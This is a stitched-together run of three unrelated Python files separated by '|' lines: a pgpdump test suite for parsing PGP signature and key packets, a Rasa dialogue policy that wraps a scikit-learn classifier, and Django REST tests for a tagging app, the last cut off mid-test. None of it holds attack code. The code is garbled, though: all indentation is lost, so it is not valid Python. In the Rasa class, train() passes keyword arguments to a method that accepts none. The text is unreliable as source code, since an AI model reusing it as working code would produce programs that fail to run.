fprint = b"A5CA9D5515DC2CA73DF748CA5C2E46A0F53A76ED"
key_id = b"5C2E46A0F53A76ED"
short = b"F53A76ED"
different = b"A5CA9D55"
self.assertTrue(same_key(fprint, fprint))
self.assertTrue(same_key(fprint, key_id))
self.assertTrue(same_key(fprint, short))
self.assertTrue(same_key(key_id, fprint))
self.assertTrue(same_key(key_id, key_id))
self.assertTrue(same_key(key_id, short))
self.assertTrue(same_key(short, fprint))
self.assertTrue(same_key(short, key_id))
self.assertTrue(same_key(short, short))
self.assertFalse(same_key(fprint, different))
self.assertFalse(same_key(key_id, different))
self.assertFalse(same_key(short, different))
self.assertFalse(same_key(different, fprint))
self.assertFalse(same_key(different, key_id))
self.assertFalse(same_key(different, short))
class Helper(object):
def check_sig_packet(self, packet, length, version, typ,
creation_time, key_id, pub_alg, hash_alg):
'''Helper method for quickly verifying several fields on a signature
packet.'''
self.assertEqual(2, packet.raw)
self.assertEqual(length, packet.length)
self.assertEqual(version, packet.sig_version)
self.assertEqual(typ, packet.raw_sig_type)
self.assertEqual(creation_time, packet.raw_creation_time)
self.assertEqual(key_id, packet.key_id)
self.assertEqual(pub_alg, packet.raw_pub_algorithm)
self.assertEqual(hash_alg, packet.raw_hash_algorithm)
# test some of the lazy lookup methods
if typ == 0x18:
self.assertEqual("Subkey Binding Signature", packet.sig_type)
if pub_alg == 17:
self.assertEqual("DSA Digital Signature Algorithm",
packet.pub_algorithm)
if hash_alg == 2:
self.assertEqual("SHA1", packet.hash_algorithm)
def load_data(self, filename):
full_path = os.path.join('testdata', filename)
self.assertTrue(os.path.exists(full_path))
with open(full_path, 'rb') as fileobj:
data = fileobj.read()
return data
# Here for 2.6 compatibility; these won't be used by 2.7 and up
def assertIsNone(self, obj, msg=None):
return self.assertTrue(obj is None, msg)
def assertIsNotNone(self, obj, msg=None):
return self.assertFalse(obj is None, msg)
class ParseTestCase(TestCase, Helper):
def test_parse_empty(self):
self.assertRaises(PgpdumpException, BinaryData, None)
def test_parse_short(self):
self.assertRaises(PgpdumpException, BinaryData, [0x00])
def test_parse_invalid(self):
self.assertRaises(PgpdumpException, BinaryData, [0x00, 0x00])
def test_parse_single_sig_packet(self):
base64_sig = b"iEYEABECAAYFAk6A4a4ACgkQXC5GoPU6du1ATACgodGyQne3Rb7"\
b"/eHBMRdau1KNSgZYAoLXRWt2G2wfp7haTBjJDFXMGsIMi"
sig = base64.b64decode(base64_sig)
data = BinaryData(sig)
packets = list(data.packets())
self.assertEqual(1, len(packets))
sig_packet = packets[0]
self.assertFalse(sig_packet.new)
self.check_sig_packet(sig_packet, 70, 4, 0, 1317069230,
b"5C2E46A0F53A76ED", 17, 2)
self.assertEqual(2, len(sig_packet.subpackets))
self.assertEqual(["Signature Creation Time", "Issuer"],
[sp.name for sp in sig_packet.subpackets])
def test_parse_ascii_sig_packet(self):
asc_data = b'''
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)
iEYEABECAAYFAk6neOwACgkQXC5GoPU6du23AQCgghWjIFgBazXWIZNj4PGnkuYv
gMsAoLGOjudliDT9u0UqxN9KeJ22Jdne
=KYol
-----END PGP SIGNATURE-----'''
data = AsciiData(asc_data)
packets = list(data.packets())
self.assertEqual(1, len(packets))
sig_packet = packets[0]
self.assertFalse(sig_packet.new)
self.check_sig_packet(sig_packet, 70, 4, 0, 1319598316,
b"5C2E46A0F53A76ED", 17, 2)
self.assertEqual(2, len(sig_packet.subpackets))
def test_parse_bad_crc(self):
asc_data = b'''
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)
iEYEABECAAYFAk6neOwACgkQXC5GoPU6du23AQCgghWjIFgBazXWIZNj4PGnkuYv
gMsAoLGOjudliDT9u0UqxN9KeJ22JdnX
=KYol
-----END PGP SIGNATURE-----'''
self.assertRaises(PgpdumpException, AsciiData, asc_data)
class ParseDataTestCase(TestCase, Helper):
def test_parse_v3_sig(self):
asc_data = b'''
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.18 (GNU/Linux)
iD8DBQBPWDfGXC5GoPU6du0RAq6XAKC3TejpiBsu3pGF37Q9Id/vPzoFlwCgtwXE
E/GGdt/Cn5Rr1G933H9nwxo=
=aJ6u
-----END PGP SIGNATURE-----'''
data = AsciiData(asc_data)
packets = list(data.packets())
self.assertEqual(1, len(packets))
sig_packet = packets[0]
self.assertFalse(sig_packet.new)
self.check_sig_packet(sig_packet, 63, 3, 0, 1331181510,
b"5C2E46A0F53A76ED", 17, 2)
self.assertEqual(b'\xae\x97', sig_packet.hash2)
self.assertEqual(0, len(sig_packet.subpackets))
def test_parse_ascii_clearsign(self):
'''This is a clearsigned document with an expiring signature, so tests
both the ignore pattern in AsciiData as well as additional signature
subpackets.'''
asc_data = self.load_data('README.asc')
data = AsciiData(asc_data)
packets = list(data.packets())
self.assertEqual(1, len(packets))
sig_packet = packets[0]
self.assertFalse(sig_packet.new)
self.assertEqual(3, len(sig_packet.subpackets))
self.check_sig_packet(sig_packet, 76, 4, 1, 1332874080,
b"5C2E46A0F53A76ED", 17, 2)
# raw expires time is in seconds from creation date
self.assertEqual(345600, sig_packet.raw_expiration_time)
expires = datetime(2012, 3, 31, 18, 48, 00)
self.assertEqual(expires, sig_packet.expiration_time)
def test_parse_linus_binary(self):
rawdata = self.load_data('linus.gpg')
data = BinaryData(rawdata)
packets = list(data.packets())
self.assertEqual(44, len(packets))
seen = 0
for packet in packets:
# all 44 packets are of the known 'old' variety
self.assertFalse(packet.new)
if isinstance(packet, SignaturePacket):
# a random signature plucked off the key
if packet.key_id == b"E7BFC8EC95861109":
seen += 1
self.check_sig_packet(packet, 540, 4, 0x10, 1319560576,
b"E7BFC8EC95861109", 1, 8)
self.assertEqual(2, len(packet.subpackets))
# a particularly dastardly sig- a ton of hashed sub parts,
# this is the "positive certification packet"
elif packet.key_id == b"79BE3E4300411886" and \
packet.raw_sig_type == 0x13:
seen += 1
self.check_sig_packet(packet, 312, 4, 0x13, 1316554898,
b"79BE3E4300411886", 1, 2)
self.assertEqual(8, len(packet.subpackets))
# another sig from key above, the "subkey binding sig"
elif packet.key_id == b"79BE3E4300411886" and \
packet.raw_sig_type == 0x18:
seen += 1
self.check_sig_packet(packet, 287, 4, 0x18, 1316554898,
b"79BE3E4300411886", 1, 2)
self.assertEqual(3, len(packet.subpackets))
elif isinstance(packet, PublicSubkeyPacket):
seen += 1
self.assertEqual(4, packet.pubkey_version)
self.assertEqual(1316554898, packet.raw_creation_time)
self.assertEqual(1, packet.raw_pub_algorithm)
self.assertIsNotNone(packet.modulus)
self.assertEqual(2048, packet.modulus_bitlen)
self.assertEqual(65537, packet.exponent)
self.assertEqual(b"012F54CA", packet.fingerprint[32:])
elif isinstance(packet, PublicKeyPacket):
seen += 1
self.assertEqual(4, packet.pubkey_version)
self.assertEqual(1316554898, packet.raw_creation_time)
self.assertEqual(1, packet.raw_pub_algorithm)
self.assertEqual("RSA Encrypt or Sign", packet.pub_algorithm)
self.assertIsNotNone(packet.modulus)
self.assertEqual(2048, packet.modulus_bitlen)
self.assertEqual(65537, packet.exponent)
self.assertEqual(b"ABAF11C65A2970B130ABE3C479BE3E4300411886",
packet.fingerprint)
self.assertEqual(b"79BE3E4300411886", packet.key_id)
elif isinstance(packet, UserIDPacket):
seen += 1
self.assertEqual("Linus Torvalds", packet.user_name)
self.assertEqual("torvalds@linux-foundation.org",
packet.user_email)
self.assertEqual(6, seen)
def test_parse_linus_ascii(self):
rawdata = self.load_data('linus.asc')
data = AsciiData(rawdata)
packets = list(data.packets())
self.assertEqual(44, len(packets))
# Note: we could do all the checks we did above in the binary version,
# but this is really only trying to test the AsciiData extras, not the
# full stack.
def test_parse_dan(self):
'''This key has DSA and ElGamal keys, which Linus' does not have.'''
rawdata = self.load_data('dan.gpg')
data = BinaryData(rawdata)
packets = list(data.packets())
self.assertEqual(9, len(packets))
# 3 user ID packets
self.assertEqual(3, sum(1 for p in packets if p.raw == 13))
# 4 signature packets
self.assertEqual(4, sum(1 for p in packets if p.raw == 2))
seen = 0
for packet in packets:
self.assertFalse(packet.new)
if isinstance(packet, PublicSubkeyPacket):
seen += 1
self.assertEqual(16, packet.raw_pub_algorithm)
self.assertEqual("elg", packet.pub_algorithm_type)
self.assertIsNotNone(packet.prime)
self.assertIsNone(packet.group_order)
self.assertIsNotNone(packet.group_gen)
self.assertIsNotNone(packet.key_value)
self.assertEqual(b"C3751D38", packet.fingerprint[32:])
elif isinstance(packet, PublicKeyPacket):
seen += 1
self.assertEqual(17, packet.raw_pub_algorithm)
self.assertEqual("dsa", packet.pub_algorithm_type)
self.assertIsNotNone(packet.prime)
self.assertIsNotNone(packet.group_order)
self.assertIsNotNone(packet.group_gen)
self.assertIsNotNone(packet.key_value)
self.assertEqual(b"A5CA9D5515DC2CA73DF748CA5C2E46A0F53A76ED",
packet.fingerprint)
self.assertEqual(2, seen)
def test_parse_junio(self):
'''This key has a single user attribute packet, which also uses the new
size format on the outer packet, which is rare.'''
rawdata = self.load_data('junio.gpg')
data = BinaryData(rawdata)
packets = list(data.packets())
self.assertEqual(13, len(packets))
# 3 user ID packets
self.assertEqual(4, sum(1 for p in packets if p.raw == 13))
# 4 signature packets
self.assertEqual(6, sum(1 for p in packets if p.raw == 2))
# 1 public subkey packet
self.assertEqual(1, sum(1 for p in packets if p.raw == 14))
# 1 user attribute packet
self.assertEqual(1, sum(1 for p in packets if p.raw == 17))
# check the user attribute packet
ua_packet = [p for p in packets if p.raw == 17][0]
self.assertEqual("jpeg", ua_packet.image_format)
self.assertEqual(1513, len(ua_packet.image_data))
def test_parse_v3_pubkeys(self):
'''Two older version 3 public keys.'''
rawdata = self.load_data('v3pubkeys.gpg')
data = BinaryData(rawdata)
packets = list(data.packets())
self.assertEqual(2, len(packets))
packet = packets[0]
self.assertTrue(isinstance(packet, PublicKeyPacket))
self.assertEqual(1, packet.raw_pub_algorithm)
self.assertEqual("rsa", packet.pub_algorithm_type)
self.assertEqual(944849149, packet.raw_creation_time)
self.assertIsNone(packet.expiration_time)
self.assertIsNotNone(packet.modulus)
self.assertEqual(2048, packet.modulus_bitlen)
self.assertIsNotNone(packet.exponent)
self.assertEqual(b"3FC0BF6B", packet.key_id)
self.assertEqual(b"7D263C88A1AB7737E31150CB4F3A211A",
packet.fingerprint)
packet = packets[1]
self.assertTrue(isinstance(packet, PublicKeyPacket))
self.assertEqual(1, packet.raw_pub_algorithm)
self.assertEqual("rsa", packet.pub_algorithm_type)
self.assertEqual(904151571, packet.raw_creation_time)
self.assertIsNone(packet.expiration_time)
self.assertIsNotNone(packet.modulus)
self.assertEqual(1024, packet.modulus_bitlen)
self.assertIsNotNone(packet.exponent)
self.assertEqual(b"3DDE776D", packet.key_id)
self.assertEqual(b"48A4F9F891F093019BC7FC532A3C5692",
packet.fingerprint)
def test_parse_v3_elgamal_pk(self):
'''Two older version 3 public keys.'''
rawdata = self.load_data('v3elgpk.asc')
data = AsciiData(rawdata)
packets = list(data.packets())
self.assertEqual(3, len(packets))
packet = packets[0]
self.assertTrue(isinstance(packet, PublicKeyPacket))
self.assertEqual(16, packet.raw_pub_algorithm)
self.assertEqual("elg", packet.pub_algorithm_type)
self.assertEqual(888716291, packet.raw_creation_time)
self.assertIsNone(packet.expiration_time)
self.assertIsNone(packet.modulus)
self.assertIsNone(packet.modulus_bitlen)
self.assertIsNone(packet.exponent)
self.assertIsNotNone(packet.prime)
self.assertIsNotNone(packet.group_gen)
self.assertEqual(b"FF570A03", packet.key_id)
self.assertEqual(b"7C4529FB11669ACA567BD53972000594",
packet.fingerprint)
self.assertTrue(isinstance(packets[1], UserIDPacket))
packet = packets[2]
self.assertTrue(isinstance(packet, SignaturePacket))
self.assertEqual(16, packet.raw_pub_algorithm)
self.assertEqual(888716292, packet.raw_creation_time)
class EncryptedPacketsTestCase(TestCase, Helper):
def test_parse_sessionkey_elg(self):
'''This file contains a public key and message encrypted with an
ElGamal Encrypt-Only key.'''
asc_data = self.load_data('sessionkey_elg.asc')
data = AsciiData(asc_data)
packets = list(data.packets())
self.assertEqual(2, len(packets))
session_key = packets[0]
self.assertEqual(3, session_key.session_key_version)
self.assertEqual(b"B705D3A4C3751D38", session_key.key_id)
self.assertEqual(16, session_key.raw_pub_algorithm)
self.assertEqual("ElGamal Encrypt-Only", session_key.pub_algorithm)
def test_parse_sessionkey_rsa(self):
'''This file contains a public key and message encrypted with a RSA
Encrypt or Sign key.'''
asc_data = self.load_data('sessionkey_rsa.asc')
data = AsciiData(asc_data)
packets = list(data.packets())
self.assertEqual(2, len(packets))
session_key = packets[0]
self.assertEqual(3, session_key.session_key_version)
self.assertEqual(b"1C39A7BD114BFFA5", session_key.key_id)
self.assertEqual(1, session_key.raw_pub_algorithm)
self.assertEqual("RSA Encrypt or Sign", session_key.pub_algorithm)
def test_parse_partial_length(self):
'''This file contains an encrypted message with a Partial Body Length header
Reference: http://tools.ietf.org/html/rfc4880#section-4.2.2.4
'''
rawdata = self.load_data('partial_length.gpg')
data = BinaryData(rawdata)
packets = list(data.packets())
self.assertEqual(2, len(packets))
class PacketTestCase(TestCase):
def test_lookup_type(self):
self.assertEqual("Signature Packet", TAG_TYPES[2][0])
def test_old_tag_length(self):
data = [
((1, 2), [0xb0, 0x02]),
((1, 70), [0x88, 0x46]),
((2, 284), [0x89, 0x01, 0x1c]),
((2, 525), [0xb9, 0x02, 0x0d]),
((2, 1037), [0xb9, 0x04, 0x0d]),
((2, 1037), bytearray(b'\xb9\x04\x0d')),
((2, 5119), [0xb9, 0x13, 0xff]),
((4, 100000), [0xba, 0x00, 0x01, 0x86, 0xa0]),
]
for expected, invals in data:
self.assertEqual(expected, old_tag_length(invals, 0))
def test_new_tag_length(self):
data = [
((1, 2, False), [0x02]),
((1, 16, False), [0x10]),
((1, 100, False), [0x64]),
((1, 166, False), [0xa6]),
((1, 168, False), [0xa8]),
((2, 1723, False), [0xc5, 0xfb]),
((2, 3923, False), [0xce, 0x93]),
((2, 5119, False), [0xd3, 0x3f]),
((2, 6476, False), [0xd8, 0x8c]),
((1, 8192, True), [0xed]),
((5, 26306, False), [0xff, 0x00, 0x00, 0x66, 0xc2]),
((5, 26306, False), bytearray(b'\xff\x00\x00\x66\xc2')),
((5, 100000, False), [0xff, 0x00, 0x01, 0x86, 0xa0]),
]
for expected, invals in data:
self.assertEqual(expected, new_tag_length(invals, 0))
class SecretKeyPacketTestCase(TestCase, Helper):
def test_parse_encrypted(self):
rawdata = self.load_data('v4_secret_encrypted.gpg')
data = BinaryData(rawdata)
packets = list(data.packets())
self.assertEqual(7, len(packets))
subs_seen = 0
for packet in packets:
self.assertFalse(packet.new)
if isinstance(packet, SecretSubkeyPacket):
subs_seen += 1
if subs_seen == 1:
# elg packet
self.assertEqual("elg", packet.pub_algorithm_type)
self.assertEqual(254, packet.s2k_id)
self.assertEqual("Iterated and Salted S2K", packet.s2k_type)
self.assertEqual(
bytearray(b"\x8d\x89\xbd\xdf\x01\x0e\x22\xcd"),
packet.s2k_iv)
elif subs_seen == 2:
# rsa packet
self.assertEqual("rsa", packet.pub_algorithm_type)
self.assertEqual(254, packet.s2k_id)
self.assertEqual("Iterated and Salted S2K", packet.s2k_type)
self.assertEqual(
bytearray(b"\x09\x97\x6b\xf5\xd4\x28\x41\x1d"),
packet.s2k_iv)
elif isinstance(packet, SecretKeyPacket):
self.assertEqual("dsa", packet.pub_algorithm_type)
self.assertEqual(254, packet.s2k_id)
self.assertEqual("Iterated and Salted S2K", packet.s2k_type)
self.assertEqual("CAST5", packet.s2k_cipher)
self.assertEqual("SHA1", packet.s2k_hash)
self.assertEqual(
bytearray(b"\xc3\x87\xeb\xca\x9b\xce\xbc\x78"),
packet.s2k_iv)
def test_parse_plain(self):
'''The raw values below were extracted from the C version of pgpdump.
The hex strings it outputs were converted to base 10 by running the
following function over the hex strings:
def to_int(x):
return int(x.replace(' ', ''), 16)
'''
rawdata = self.load_data('v4_secret_plain.gpg')
data = BinaryData(rawdata)
packets = list(data.packets())
self.assertEqual(7, len(packets))
subs_seen = 0
for packet in packets:
self.assertFalse(packet.new)
if isinstance(packet, SecretSubkeyPacket):
subs_seen += 1
if subs_seen == 1:
# elg packet
self.assertEqual("elg", packet.pub_algorithm_type)
self.assertEqual(0, packet.s2k_id)
self.assertEqual(None, packet.s2k_type)
self.assertEqual(None, packet.s2k_iv)
self.assertEqual(245799026332407193298181926223748572866928987611495184689013385965880161244176879821250061522687647728, packet.exponent_x)
elif subs_seen == 2:
# rsa packet
self.assertEqual("rsa", packet.pub_algorithm_type)
self.assertEqual(0, packet.s2k_id)
self.assertEqual(None, packet.s2k_type)
self.assertEqual(None, packet.s2k_iv)
self.assertEqual(107429307998432888320715351604215972074903508478185926034856042440678824041847327442082101397552291647796540657257050768251344941490371163761048934745124363183224819621105784780195398083026664006729876758821509430352212953204518272377415915285011886868211417421097179985188014641310204357388385968166040278287, packet.multiplicative_inverse)
self.assertEqual(139930219416447408374822893460828502304441966752753468842648203646336195082149424690339775194932419616945814365656771053789999508162542355224095838373016952414720809190039261860912609841054241835835137530162417625471114503804567967161522096406622711734972153324109508774000862492521907132111400296639152885151, packet.prime_p)
self.assertEqual(141774976438365791329330227605232641244334061384594969589427240157587195987726021563323880620442249788289724672124037112182500862823754846020398652238714637523098123565121790819658975965315629614215592460191153065569430777288475743983312129144619017542854009503581558744199305796137178366407180728113362644607, packet.prime_q)
self.assertEqual(5830467418164177455383939797360032476940913805978768568081128075462505586965694225559897974113088818228809697270431492119090365699278285350171676334156873270109344274747057694689185206358606371235913423003163252354603704380371252575866102476793736443620998412227609599802054206292004785471167177881398711806191315950196087041018693839148033680564198494910540148825273531803832541184563811332315506727878483469747798396155096313345751606322830230368849084875744911041500024805242117661173352379509490605300753957220916597285056567409410296154792321206401452887335121085203916552891062930596871199021743741984622581173, packet.exponent_d)
elif isinstance(packet, SecretKeyPacket):
self.assertEqual("dsa", packet.pub_algorithm_type)
self.assertEqual(254, packet.s2k_id)
self.assertEqual("GnuPG S2K", packet.s2k_type)
self.assertEqual("CAST5", packet.s2k_cipher)
self.assertEqual("SHA1", packet.s2k_hash)
self.assertEqual(None, packet.s2k_iv)
def test_parse_mode_1002(self):
rawdata = self.load_data('secret_key_mode_1002.bin')
data = BinaryData(rawdata)
packets = list(data.packets())
self.assertEqual(7, len(packets))
for packet in packets:
self.assertFalse(packet.new)
if isinstance(packet, SecretKeyPacket):
# this block matches both top-level and subkeys
self.assertEqual("rsa", packet.pub_algorithm_type)
self.assertEqual(255, packet.s2k_id)
self.assertEqual("GnuPG S2K", packet.s2k_type)
self.assertEqual("Plaintext or unencrypted", packet.s2k_cipher)
self.assertEqual("Unknown", packet.s2k_hash)
self.assertEqual(None, packet.s2k_iv)
if __name__ == '__main__':
main()
|
|
import typing
import json
import logging
import numpy as np
import os
import pickle
import warnings
from sklearn.base import clone
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import GridSearchCV
from sklearn.preprocessing import LabelEncoder
# noinspection PyProtectedMember
from sklearn.utils import shuffle as sklearn_shuffle
from typing import Optional, Any, List, Text, Dict, Callable
from rasa.core import utils
from rasa.core.domain import Domain
from rasa.core.featurizers import (
TrackerFeaturizer, MaxHistoryTrackerFeaturizer)
from rasa.core.policies.policy import Policy
from rasa.core.trackers import DialogueStateTracker
logger = logging.getLogger(__name__)
if typing.TYPE_CHECKING:
import sklearn
class SklearnPolicy(Policy):
"""Use an sklearn classifier to train a policy."""
def __init__(
self,
featurizer: Optional[MaxHistoryTrackerFeaturizer] = None,
priority: int = 1,
model: Optional['sklearn.base.BaseEstimator'] = None,
param_grid: Optional[Dict[Text, List] or List[Dict]] = None,
cv: Optional[int] = None,
scoring: Optional[Text or List or Dict or Callable] = 'accuracy',
label_encoder: LabelEncoder = LabelEncoder(),
shuffle: bool = True,
**kwargs: Any
) -> None:
"""Create a new sklearn policy.
Args:
featurizer: Featurizer used to convert the training data into
vector format.
model: The sklearn model or model pipeline.
param_grid: If *param_grid* is not None and *cv* is given,
a grid search on the given *param_grid* is performed
(e.g. *param_grid={'n_estimators': [50, 100]}*).
cv: If *cv* is not None, perform a cross validation on
the training data. *cv* should then conform to the
sklearn standard (e.g. *cv=5* for a 5-fold cross-validation).
scoring: Scoring strategy, using the sklearn standard.
label_encoder: Encoder for the labels. Must implement an
*inverse_transform* method.
shuffle: Whether to shuffle training data.
"""
if featurizer:
if not isinstance(featurizer, MaxHistoryTrackerFeaturizer):
raise TypeError("Passed featurizer of type {}, should be "
"MaxHistoryTrackerFeaturizer."
"".format(type(featurizer).__name__))
super(SklearnPolicy, self).__init__(featurizer, priority)
self.model = model or self._default_model()
self.cv = cv
self.param_grid = param_grid
self.scoring = scoring
self.label_encoder = label_encoder
self.shuffle = shuffle
# attributes that need to be restored after loading
self._pickle_params = [
'model', 'cv', 'param_grid', 'scoring', 'label_encoder']
self._train_params = kwargs
@staticmethod
def _default_model():
return LogisticRegression(solver="liblinear",
multi_class="auto")
@property
def _state(self):
return {attr: getattr(self, attr) for attr in self._pickle_params}
def model_architecture(self):
# filter out kwargs that cannot be passed to model
self._train_params = self._get_valid_params(self.model.__init__,
**self._train_params)
return self.model.set_params(**self._train_params)
def _extract_training_data(self, training_data):
# transform y from one-hot to num_classes
X, y = training_data.X, training_data.y.argmax(axis=-1)
if self.shuffle:
X, y = sklearn_shuffle(X, y)
return X, y
def _preprocess_data(self, X, y=None):
Xt = X.reshape(X.shape[0], -1)
if y is None:
return Xt
else:
yt = self.label_encoder.transform(y)
return Xt, yt
def _search_and_score(self, model, X, y, param_grid):
search = GridSearchCV(
model,
param_grid=param_grid,
cv=self.cv,
scoring='accuracy',
verbose=1,
)
search.fit(X, y)
print("Best params:", search.best_params_)
return search.best_estimator_, search.best_score_
def train(self,
training_trackers: List[DialogueStateTracker],
domain: Domain,
**kwargs: Any
) -> None:
training_data = self.featurize_for_training(training_trackers,
domain,
**kwargs)
X, y = self._extract_training_data(training_data)
model = self.model_architecture(**kwargs)
score = None
# Note: clone is called throughout to avoid mutating default
# arguments.
self.label_encoder = clone(self.label_encoder).fit(y)
Xt, yt = self._preprocess_data(X, y)
if self.cv is None:
model = clone(model).fit(Xt, yt)
else:
param_grid = self.param_grid or {}
model, score = self._search_and_score(
model, Xt, yt, param_grid)
self.model = model
logger.info("Done fitting sklearn policy model")
if score is not None:
logger.info("Cross validation score: {:.5f}".format(score))
def _postprocess_prediction(self, y_proba, domain):
yp = y_proba[0].tolist()
# Some classes might not be part of the training labels. Since
# sklearn does not predict labels it has never encountered
# during training, it is necessary to insert missing classes.
indices = self.label_encoder.inverse_transform(np.arange(len(yp)))
y_filled = [0.0 for _ in range(domain.num_actions)]
for i, pred in zip(indices, yp):
y_filled[i] = pred
return y_filled
def predict_action_probabilities(self,
tracker: DialogueStateTracker,
domain: Domain) -> List[float]:
X = self.featurizer.create_X([tracker], domain)
Xt = self._preprocess_data(X)
y_proba = self.model.predict_proba(Xt)
return self._postprocess_prediction(y_proba, domain)
def persist(self, path: Text) -> None:
if self.model:
self.featurizer.persist(path)
meta = {"priority": self.priority}
meta_file = os.path.join(path, 'sklearn_policy.json')
utils.dump_obj_as_json_to_file(meta_file, meta)
filename = os.path.join(path, 'sklearn_model.pkl')
with open(filename, 'wb') as f:
pickle.dump(self._state, f)
else:
warnings.warn("Persist called without a trained model present. "
"Nothing to persist then!")
@classmethod
def load(cls, path: Text) -> Policy:
filename = os.path.join(path, 'sklearn_model.pkl')
if not os.path.exists(path):
raise OSError("Failed to load dialogue model. Path {} "
"doesn't exist".format(os.path.abspath(filename)))
featurizer = TrackerFeaturizer.load(path)
assert isinstance(featurizer, MaxHistoryTrackerFeaturizer), \
("Loaded featurizer of type {}, should be "
"MaxHistoryTrackerFeaturizer.".format(type(featurizer).__name__))
meta_file = os.path.join(path, "sklearn_policy.json")
meta = json.loads(utils.read_file(meta_file))
policy = cls(featurizer=featurizer, priority=meta["priority"])
with open(filename, 'rb') as f:
state = pickle.load(f)
vars(policy).update(state)
logger.info("Loaded sklearn model")
return policy
|
|
from urllib.parse import quote
from django.test.testcases import TestCase
from django.core.exceptions import ObjectDoesNotExist
from django.contrib.contenttypes.models import ContentType
from rest_framework.test import APIClient
from generic_tagging.tests.factories import TagFactory, TaggedItemFactory, UserFactory, \
TagTestArticle0Factory, TagTestArticle1Factory
from generic_tagging.models import Tag, TaggedItem
from generic_tagging.tests.models import TagTestArticle0
from generic_tagging.tests.compatibility import patch
class TagViewSetTestCase(TestCase):
def setUp(self):
self.tags = [
TagFactory(label='aaa 0'),
TagFactory(label='bbb 1'),
TagFactory(label='ccc 2')
]
self.client = APIClient()
@staticmethod
def _dict_for_tag(tag):
return {'id': tag.pk,
'label': tag.label,
'url': '/%s/' % quote(tag.label)}
def test_list(self):
r = self.client.get('/api/tags/')
self.assertEqual(r.status_code, 200)
self.assertEqual(r.data, [
self._dict_for_tag(self.tags[0]),
self._dict_for_tag(self.tags[1]),
self._dict_for_tag(self.tags[2]),
])
def test_retrieve(self):
r = self.client.get('/api/tags/{}/'.format(self.tags[0].pk))
self.assertEqual(r.status_code, 200)
self.assertEqual(r.data, self._dict_for_tag(self.tags[0]))
def test_create(self):
self.assertRaises(ObjectDoesNotExist, Tag.objects.get, label='new label')
r = self.client.post('/api/tags/', {'label': 'new label'}, format='json')
self.assertEqual(r.status_code, 201)
self.assertIsNotNone(Tag.objects.get(label='new label'))
def test_delete(self):
tag = TagFactory()
count = Tag.objects.count()
r = self.client.delete('/api/tags/%d/' % tag.pk)
self.assertEqual(r.status_code, 204)
self.assertEqual(Tag.objects.count(), count - 1)
def test_update(self):
tag = TagFactory()
r = self.client.patch('/api/tags/%d/' % tag.pk, {'label': 'new name'})
self.assertEqual(r.status_code, 405)
class TaggedItemViewSetTestCase(TestCase):
def setUp(self):
self.user = UserFactory()
def test_list_with_no_parameter(self):
r = self.client.get('/api/tagged_items/')
self.assertEqual(r.status_code, 400)
def test_list_with_object_id_only(self):
article0 = TagTestArticle0Factory()
TaggedItemFactory(content_object=article0)
r = self.client.get('/api/tagged_items/', {'object_id': article0.pk})
self.assertEqual(r.status_code, 400)
def test_list_with_content_type_only(self):
article0 = TagTestArticle0Factory()
TaggedItemFactory(content_object=article0)
ct = ContentType.objects.get_for_model(article0)
r = self.client.get('/api/tagged_items/', {'content_type': ct.pk})
self.assertEqual(r.status_code, 400)
def test_list_with_object(self):
article0 = TagTestArticle0Factory()
article1 = TagTestArticle1Factory()
tagged_item0 = TaggedItemFactory(content_object=article0)
tagged_item1 = TaggedItemFactory(content_object=article0)
tagged_item2 = TaggedItemFactory(content_object=article1)
ct0 = ContentType.objects.get_for_model(article0)
ct1 = ContentType.objects.get_for_model(article1)
with patch.object(TagTestArticle0, 'get_absolute_url', create=True, return_value='/absolute_url/'):
r = self.client.get('/api/tagged_items/', {'content_type': ct0.pk, 'object_id': article0.pk})
self.assertEqual(r.status_code, 200)
self.assertEqual(len(r.data), 2)
self.assertEqual(r.data[0]['id'], tagged_item0.pk)
self.assertEqual(r.data[1]['id'], tagged_item1.pk)
self.assertEqual(r.data[0], {
'id': tagged_item0.pk,
'content_type': tagged_item0.content_type.pk,
'object_id': tagged_item0.object_id,
'content_object': {
'content_type': tagged_item0.content_type.pk,
'object_id': tagged_item0.object_id,
'str': str(tagged_item0.content_object),
'url': '/absolute_url/'
},
'author': tagged_item0.author.pk,
'locked': False,
'created_at': tagged_item0.created_at.isoformat(),
'tag': {
'label': tagged_item0.tag.label,
'id': tagged_item0.tag.pk,
'url': '/%s/' % quote(tagged_item0.tag.label)
},
'detail_api_url': '/api/tagged_items/%d/' % tagged_item0.pk,
'lock_api_url': '/api/tagged_items/%d/lock/' % tagged_item0.pk,
'unlock_api_url': '/api/tagged_items/%d/unlock/' % tagged_item0.pk,
})
r = self.client.get('/api/tagged_items/', {'content_type': ct1.pk, 'object_id': article1.pk})
self.assertEqual(r.status_code, 200)
self.assertEqual(len(r.data), 1)
self.assertEqual(r.data[0]['id'], tagged_item2.pk)
self.assertEqual(r.data[0], {
'id': tagged_item2.pk,
'content_type': tagged_item2.content_type.pk,
'object_id': tagged_item2.object_id,
'content_object': {
'content_type': tagged_item2.content_type.pk,
'object_id': tagged_item2.object_id,
'str': str(tagged_item2.content_object),
'url': None
},
'author': tagged_item2.author.pk,
'locked': False,
'created_at': tagged_item2.created_at.isoformat(),
'tag': {
'label': tagged_item2.tag.label,
'id': tagged_item2.tag.pk,
'url': '/%s/' % quote(tagged_item2.tag.label)
},
'detail_api_url': '/api/tagged_items/%d/' % tagged_item2.pk,
'lock_api_url': '/api/tagged_items/%d/lock/' % tagged_item2.pk,
'unlock_api_url': '/api/tagged_items/%d/unlock/' % tagged_item2.pk,
})
def test_retrieve(self):
tagged_item = TaggedItemFactory()
r = self.client.get('/api/tagged_items/%d/' % tagged_item.pk)
self.assertEqual(r.status_code, 405)
def test_create_with_new_tag(self):
item_count = TaggedItem.objects.count()
tag_count = Tag.objects.count()
article = TagTestArticle0Factory()
ct = ContentType.objects.get_for_model(article)
r = self.client.post('/api/tagged_items/', {'tag': 'new tag', 'object_id': article.pk, 'content_type': ct.pk})
self.assertEqual(r.status_code, 201)
self.assertEqual(TaggedItem.objects.count(), item_count + 1)
self.assertEqual(Tag.objects.count(), tag_count + 1)
tagged_item = TaggedItem.objects.all()[0]
self.assertIsNone(tagged_item.author)
def test_create_with_exist_tag(self):
TagFactory(label='exist tag')
article = TagTestArticle0Factory()
ct = ContentType.objects.get_for_model(article)
item_count = TaggedItem.objects.count()
tag_count = Tag.objects.count()
